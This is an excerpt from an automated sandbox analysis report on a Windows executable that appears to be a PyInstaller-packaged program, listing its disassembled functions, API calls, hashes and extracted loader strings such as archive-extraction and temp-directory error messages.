                                                                                                                                                                                                      control_flow_graph 536 7ff7ff5a69d4-7ff7ff5a6a47 call 7ff7ff5a6708 539 7ff7ff5a6a61-7ff7ff5a6a6b call 7ff7ff598590 536->539 540 7ff7ff5a6a49-7ff7ff5a6a52 call 7ff7ff594f58 536->540 545 7ff7ff5a6a86-7ff7ff5a6aef CreateFileW 539->545 546 7ff7ff5a6a6d-7ff7ff5a6a84 call 7ff7ff594f58 call 7ff7ff594f78 539->546 547 7ff7ff5a6a55-7ff7ff5a6a5c call 7ff7ff594f78 540->547 549 7ff7ff5a6af1-7ff7ff5a6af7 545->549 550 7ff7ff5a6b6c-7ff7ff5a6b77 GetFileType 545->550 546->547 563 7ff7ff5a6da2-7ff7ff5a6dc2 547->563 553 7ff7ff5a6b39-7ff7ff5a6b67 GetLastError call 7ff7ff594eec 549->553 554 7ff7ff5a6af9-7ff7ff5a6afd 549->554 556 7ff7ff5a6bca-7ff7ff5a6bd1 550->556 557 7ff7ff5a6b79-7ff7ff5a6bb4 GetLastError call 7ff7ff594eec CloseHandle 550->557 553->547 554->553 561 7ff7ff5a6aff-7ff7ff5a6b37 CreateFileW 554->561 559 7ff7ff5a6bd3-7ff7ff5a6bd7 556->559 560 7ff7ff5a6bd9-7ff7ff5a6bdc 556->560 557->547 570 7ff7ff5a6bba-7ff7ff5a6bc5 call 7ff7ff594f78 557->570 566 7ff7ff5a6be2-7ff7ff5a6c37 call 7ff7ff5984a8 559->566 560->566 567 7ff7ff5a6bde 560->567 561->550 561->553 575 7ff7ff5a6c56-7ff7ff5a6c87 call 7ff7ff5a6488 566->575 576 7ff7ff5a6c39-7ff7ff5a6c45 call 7ff7ff5a6910 566->576 567->566 570->547 581 7ff7ff5a6c89-7ff7ff5a6c8b 575->581 582 7ff7ff5a6c8d-7ff7ff5a6ccf 575->582 576->575 583 7ff7ff5a6c47 576->583 584 7ff7ff5a6c49-7ff7ff5a6c51 call 7ff7ff59ab30 581->584 585 7ff7ff5a6cf1-7ff7ff5a6cfc 582->585 586 7ff7ff5a6cd1-7ff7ff5a6cd5 582->586 583->584 584->563 588 7ff7ff5a6da0 585->588 589 7ff7ff5a6d02-7ff7ff5a6d06 585->589 586->585 587 7ff7ff5a6cd7-7ff7ff5a6cec 586->587 587->585 588->563 589->588 592 7ff7ff5a6d0c-7ff7ff5a6d51 CloseHandle CreateFileW 589->592 593 7ff7ff5a6d53-7ff7ff5a6d81 GetLastError call 7ff7ff594eec call 7ff7ff5986d0 592->593 594 7ff7ff5a6d86-7ff7ff5a6d9b 592->594 593->594 594->588
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1617910340-0
                                                                                                                                                                                                      • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                      • Instruction ID: c94df809199b81bb341f8ac31c980e2f54dd82e759c8744b17fa9702197ee3d6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DBC1DE36B29A8285EB10EF65C4902AC7761FB48B98F814335DA3E5B7D4DF38D421C3A0
                                                                                                                                                                                                      Function 00007FF7FF5883B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF58841B
                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF58849E
                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF5884BD
                                                                                                                                                                                                      • FindNextFileW.KERNELBASE(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF5884CB
                                                                                                                                                                                                      • FindClose.KERNEL32(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF5884DC
                                                                                                                                                                                                      • RemoveDirectoryW.KERNELBASE(?,00007FF7FF588B09,00007FF7FF583FA5), ref: 00007FF7FF5884E5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                      • String ID: %s\*
                                                                                                                                                                                                      • API String ID: 1057558799-766152087
                                                                                                                                                                                                      • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                      • Instruction ID: 1f4735558c2cc05e2b2cae2f858f605ce02fb16e1e08164ffce82021d2475a73
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6416222A0DAC295EB20BB24E4445F9A360FB94759FC00332D57D476E4DF3CD54AC7A4
                                                                                                                                                                                                      Function 00007FF7FF5892F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                                                                                      • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                      • Instruction ID: 80f56aa61dc15b83b9b1069b43413b770e257c14297a8feb480ef5b14cc13ec1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5FF06822A197C186FB609F64B4497A6B750FB84769F840335DA7D036D4DF3CD059CA50
                                                                                                                                                                                                      Function 00007FF7FF581950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 329 7ff7ff581950-7ff7ff58198b call 7ff7ff5845b0 332 7ff7ff581c4e-7ff7ff581c72 call 7ff7ff58c5c0 329->332 333 7ff7ff581991-7ff7ff5819d1 call 7ff7ff587f80 329->333 338 7ff7ff581c3b-7ff7ff581c3e call 7ff7ff5900bc 333->338 339 7ff7ff5819d7-7ff7ff5819e7 call 7ff7ff590744 333->339 343 7ff7ff581c43-7ff7ff581c4b 338->343 344 7ff7ff5819e9-7ff7ff581a03 call 7ff7ff594f78 call 7ff7ff582910 339->344 345 7ff7ff581a08-7ff7ff581a24 call 7ff7ff59040c 339->345 343->332 344->338 350 7ff7ff581a26-7ff7ff581a40 call 7ff7ff594f78 call 7ff7ff582910 345->350 351 7ff7ff581a45-7ff7ff581a5a call 7ff7ff594f98 345->351 350->338 359 7ff7ff581a5c-7ff7ff581a76 call 7ff7ff594f78 call 7ff7ff582910 351->359 360 7ff7ff581a7b-7ff7ff581afc call 7ff7ff581c80 * 2 call 7ff7ff590744 351->360 359->338 371 7ff7ff581b01-7ff7ff581b14 call 7ff7ff594fb4 360->371 374 7ff7ff581b16-7ff7ff581b30 call 7ff7ff594f78 call 7ff7ff582910 371->374 375 7ff7ff581b35-7ff7ff581b4e call 7ff7ff59040c 371->375 374->338 381 7ff7ff581b50-7ff7ff581b6a call 7ff7ff594f78 call 7ff7ff582910 375->381 382 7ff7ff581b6f-7ff7ff581b8b call 7ff7ff590180 375->382 381->338 389 7ff7ff581b9e-7ff7ff581bac 382->389 390 7ff7ff581b8d-7ff7ff581b99 call 7ff7ff582710 382->390 389->338 393 7ff7ff581bb2-7ff7ff581bb9 389->393 390->338 395 7ff7ff581bc1-7ff7ff581bc7 393->395 396 7ff7ff581bc9-7ff7ff581bd6 395->396 397 7ff7ff581be0-7ff7ff581bef 395->397 398 7ff7ff581bf1-7ff7ff581bfa 396->398 397->397 397->398 399 7ff7ff581bfc-7ff7ff581bff 398->399 400 7ff7ff581c0f 398->400 399->400 401 7ff7ff581c01-7ff7ff581c04 399->401 402 7ff7ff581c11-7ff7ff581c24 400->402 401->400 403 7ff7ff581c06-7ff7ff581c09 401->403 404 7ff7ff581c2d-7ff7ff581c39 402->404 405 7ff7ff581c26 402->405 403->400 406 7ff7ff581c0b-7ff7ff581c0d 403->406 404->338 404->395 405->404 406->402
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF587F80: _fread_nolock.LIBCMT ref: 00007FF7FF58802A
                                                                                                                                                                                                      • _fread_nolock.LIBCMT ref: 00007FF7FF581A1B
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF582910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7FF581B6A), ref: 00007FF7FF58295E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                      • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                      • API String ID: 2397952137-3497178890
                                                                                                                                                                                                      • Opcode ID: fb8dace35f984c3c8d59b22f0dfd890ef8918d876ac5e0f6e5e6b76f1e80faa4
                                                                                                                                                                                                      • Instruction ID: e8ff027ac9776c38a0ce57b0106014e78f9e1177fbabef214dfc03ec36f5e0e7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb8dace35f984c3c8d59b22f0dfd890ef8918d876ac5e0f6e5e6b76f1e80faa4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39818D71A096C696EB20AB24D0402F9A3A1FF48784F944631E9BD477D6EE3CE585C7E0
                                                                                                                                                                                                      Function 00007FF7FF581600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 407 7ff7ff581600-7ff7ff581611 408 7ff7ff581637-7ff7ff581651 call 7ff7ff5845b0 407->408 409 7ff7ff581613-7ff7ff58161c call 7ff7ff581050 407->409 416 7ff7ff581653-7ff7ff581681 call 7ff7ff594f78 call 7ff7ff582910 408->416 417 7ff7ff581682-7ff7ff58169c call 7ff7ff5845b0 408->417 414 7ff7ff58162e-7ff7ff581636 409->414 415 7ff7ff58161e-7ff7ff581629 call 7ff7ff582710 409->415 415->414 423 7ff7ff58169e-7ff7ff5816b3 call 7ff7ff582710 417->423 424 7ff7ff5816b8-7ff7ff5816cf call 7ff7ff590744 417->424 431 7ff7ff581821-7ff7ff581824 call 7ff7ff5900bc 423->431 432 7ff7ff5816f9-7ff7ff5816fd 424->432 433 7ff7ff5816d1-7ff7ff5816f4 call 7ff7ff594f78 call 7ff7ff582910 424->433 439 7ff7ff581829-7ff7ff58183b 431->439 436 7ff7ff581717-7ff7ff581737 call 7ff7ff594fb4 432->436 437 7ff7ff5816ff-7ff7ff58170b call 7ff7ff581210 432->437 445 7ff7ff581819-7ff7ff58181c call 7ff7ff5900bc 433->445 446 7ff7ff581739-7ff7ff58175c call 7ff7ff594f78 call 7ff7ff582910 436->446 447 7ff7ff581761-7ff7ff58176c 436->447 442 7ff7ff581710-7ff7ff581712 437->442 442->445 445->431 459 7ff7ff58180f-7ff7ff581814 446->459 451 7ff7ff581802-7ff7ff58180a call 7ff7ff594fa0 447->451 452 7ff7ff581772-7ff7ff581777 447->452 451->459 454 7ff7ff581780-7ff7ff5817a2 call 7ff7ff59040c 452->454 462 7ff7ff5817da-7ff7ff5817e6 call 7ff7ff594f78 454->462 463 7ff7ff5817a4-7ff7ff5817bc call 7ff7ff590b4c 454->463 459->445 470 7ff7ff5817ed-7ff7ff5817f8 call 7ff7ff582910 462->470 468 7ff7ff5817be-7ff7ff5817c1 463->468 469 7ff7ff5817c5-7ff7ff5817d8 call 7ff7ff594f78 463->469 468->454 471 7ff7ff5817c3 468->471 469->470 474 7ff7ff5817fd 470->474 471->474 474->451
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                      • API String ID: 2050909247-1550345328
                                                                                                                                                                                                      • Opcode ID: 23ac436432f69dff89e67b7c3031c819f54d06e4f97595c0cc87ed9803ad40dc
                                                                                                                                                                                                      • Instruction ID: 42583fd67a5256244861b10729d7d39e3ba4584d00640a868a6a934d15417087
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23ac436432f69dff89e67b7c3031c819f54d06e4f97595c0cc87ed9803ad40dc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D519A21A096C392EB14BB2294401EAA3A0BF41B94FC44735EE7D47BE6DE3CE555C7E0
                                                                                                                                                                                                      Function 00007FF7FF588850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetTempPathW.KERNEL32(?,?,00000000,00007FF7FF583CBB), ref: 00007FF7FF5888F4
                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00007FF7FF583CBB), ref: 00007FF7FF5888FA
                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00007FF7FF583CBB), ref: 00007FF7FF58893C
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF588A20: GetEnvironmentVariableW.KERNEL32(00007FF7FF58388E), ref: 00007FF7FF588A57
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF588A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7FF588A79
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF5982A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5982C1
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF582810: MessageBoxW.USER32 ref: 00007FF7FF5828EA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                      • API String ID: 3563477958-1339014028
                                                                                                                                                                                                      • Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                      • Instruction ID: 86979438d1f6213863f5b2f138208d8bac97bee4d79f3f3289ff0c5bc3daa82e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A419D12A096C340EB24BB25A8552F99291FF89B85FC04331ED3D4B7D6EE3CE501C6E0
                                                                                                                                                                                                      Function 00007FF7FF581210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 599 7ff7ff581210-7ff7ff58126d call 7ff7ff58bdf0 602 7ff7ff581297-7ff7ff5812af call 7ff7ff594fb4 599->602 603 7ff7ff58126f-7ff7ff581296 call 7ff7ff582710 599->603 608 7ff7ff5812d4-7ff7ff5812e4 call 7ff7ff594fb4 602->608 609 7ff7ff5812b1-7ff7ff5812cf call 7ff7ff594f78 call 7ff7ff582910 602->609 615 7ff7ff581309-7ff7ff58131b 608->615 616 7ff7ff5812e6-7ff7ff581304 call 7ff7ff594f78 call 7ff7ff582910 608->616 622 7ff7ff581439-7ff7ff58144e call 7ff7ff58bad0 call 7ff7ff594fa0 * 2 609->622 618 7ff7ff581320-7ff7ff581345 call 7ff7ff59040c 615->618 616->622 628 7ff7ff58134b-7ff7ff581355 call 7ff7ff590180 618->628 629 7ff7ff581431 618->629 636 7ff7ff581453-7ff7ff58146d 622->636 628->629 635 7ff7ff58135b-7ff7ff581367 628->635 629->622 637 7ff7ff581370-7ff7ff581398 call 7ff7ff58a230 635->637 640 7ff7ff58139a-7ff7ff58139d 637->640 641 7ff7ff581416-7ff7ff58142c call 7ff7ff582710 637->641 642 7ff7ff581411 640->642 643 7ff7ff58139f-7ff7ff5813a9 640->643 641->629 642->641 645 7ff7ff5813ab-7ff7ff5813b9 call 7ff7ff590b4c 643->645 646 7ff7ff5813d4-7ff7ff5813d7 643->646 650 7ff7ff5813be-7ff7ff5813c1 645->650 648 7ff7ff5813ea-7ff7ff5813ef 646->648 649 7ff7ff5813d9-7ff7ff5813e7 call 7ff7ff5a9ea0 646->649 648->637 652 7ff7ff5813f5-7ff7ff5813f8 648->652 649->648 653 7ff7ff5813c3-7ff7ff5813cd call 7ff7ff590180 650->653 654 7ff7ff5813cf-7ff7ff5813d2 650->654 656 7ff7ff58140c-7ff7ff58140f 652->656 657 7ff7ff5813fa-7ff7ff5813fd 652->657 653->648 653->654 654->641 656->629 657->641 659 7ff7ff5813ff-7ff7ff581407 657->659 659->618
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                      • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                      • API String ID: 2050909247-2813020118
                                                                                                                                                                                                      • Opcode ID: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
                                                                                                                                                                                                      • Instruction ID: fc1cdf96532a676fd4d30c97842cd2cce772d914208fd1d27e531a96dd1b30c2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5203fde90a14cfca52878d148793ed0f56fa2f4a03ba52266beea290f2c18543
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB51C422A09AC241EB60BB11A4403FAE291BF85794FC44331ED7E47BE5EE3CE545C7A0
                                                                                                                                                                                                      Function 00007FF7FF59ED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7FF59F11A,?,?,-00000018,00007FF7FF59ADC3,?,?,?,00007FF7FF59ACBA,?,?,?,00007FF7FF595FAE), ref: 00007FF7FF59EEFC
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7FF59F11A,?,?,-00000018,00007FF7FF59ADC3,?,?,?,00007FF7FF59ACBA,?,?,?,00007FF7FF595FAE), ref: 00007FF7FF59EF08
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                      • API String ID: 3013587201-537541572
                                                                                                                                                                                                      • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                      • Instruction ID: 94eb0019f1b89339c6a4af6289785c40a53f72699f06dfac20263d869b6f258d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E641D221B196A282EB2AEB1698445F5A791BF48B90FC84739DD3D573D4EE3CE40582B0
                                                                                                                                                                                                      Function 00007FF7FF5836B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,00007FF7FF583804), ref: 00007FF7FF5836E1
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00007FF7FF583804), ref: 00007FF7FF5836EB
